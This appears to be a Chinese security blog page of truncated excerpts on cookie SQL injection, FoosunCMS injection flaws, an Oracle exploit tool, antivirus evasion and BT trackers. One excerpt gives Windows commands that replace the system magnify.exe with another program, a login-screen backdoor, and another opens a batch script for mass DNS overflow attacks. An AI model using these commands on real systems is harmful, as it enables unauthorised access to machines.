极端.刀口

鬼仔注：让浪子美化下，他竟然说管理员看到就不舒服了。

作者：空虚浪子心

看了就知道了，类似于查询分析器。
登录后可以执行一些语句，方便使用。
提交执行语句方面使用了AJAX。本地不会卡，在执行第一句的时候你可以直接再扔第二句上去。
搜集了两个EXP，oracle的。。。本来打算找更多，但是考虑到我比较懒。。。


如果效果好，会搞一个XML格式的，方便自定义ORACLE语句。。。打开JSP直接读取...

作者：啊D

现在很多网站都加了防注入系统代码，你输入注入语句将无法注入~~感觉这样的防注入系统不错，但防注入系统没有注意到 Cookies 的问题！所以就有了Cookies注入~~

我们来研究一下怎样情况下才会有Cookies注入!如果你学过ASP你应该会知道
Request.QueryString (GET)
或
Request.Form (POST)!
呵，没错，这就是我们用于读取用户发给WEB服务器的指定键中的...

来源：红狼论坛
PS：刚刚在红狼论坛看到的，具体未测试...简单看了下，估计是类似以前那种 shift 后门差不多....
设本程序为ivy.exe则运行以下命令即可 copy %systemroot%\system32\magnify.exe %systemroot%\system32\nagnify.exe
copy ivy.exe %systemroot%\system32\magnify.exe
copy ivy.exe %systemroot%\sy...

@shift 1
@ setlocal
@ cls
@ color A
@ title DNS批量溢出个人版
@echo ================================================================================
@echo DNS批量溢出个人版
@echo BY Amxking
@echo 1.输入您想溢出的IP段 格式：XXX.XXX.XXX.XX...

作者：jannock

今日来分析一下风讯的产品的安全性。
风讯管方最新下载，FoosunCMSv4.0sp5完整版(含模板)。安装后，查看了一下代码，发现多处SQL 注入。不由心地发出一句：这样的产品，你敢用吗？
对于ASP版。
1、漏洞文件 /User/i_Blog/Public_Save.asp
38行 p_FileName = Request.Form("FileName")
53行 set rs...

 http://bbs2.long-jf.com/showthread.php?t=429084 

收到柳叶刀 版主的PM，希望我能写一个叫做 国外BT Tracker普及的帖子，真是汗颜。其实俺接触这个才不到9个月吧，知道的也不多。最重要的是：至今还没有几个牛站的ID，所以……在这里就给大家写一下我的国外BT站ID收割经历，抛砖引玉，让更多牛人来说说吧。

话说2007年3月某日半夜，俺在睡前最后检查一下俺的...

 

https://forum.eviloctal.com/thread-31636-1-1.html

文章作者：A1Pass
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

注：本文已发表在《黑客X档案》第7期杂志上，与原文有少许出入，后由作者提交到邪恶八进制论坛，如需转载请保留此信息！

自从病毒与杀毒软件的诞生以来，他们之间的战争就从来没有停止过&hellip...

受够新浪的blog了，速度太慢。

转到这里来看看...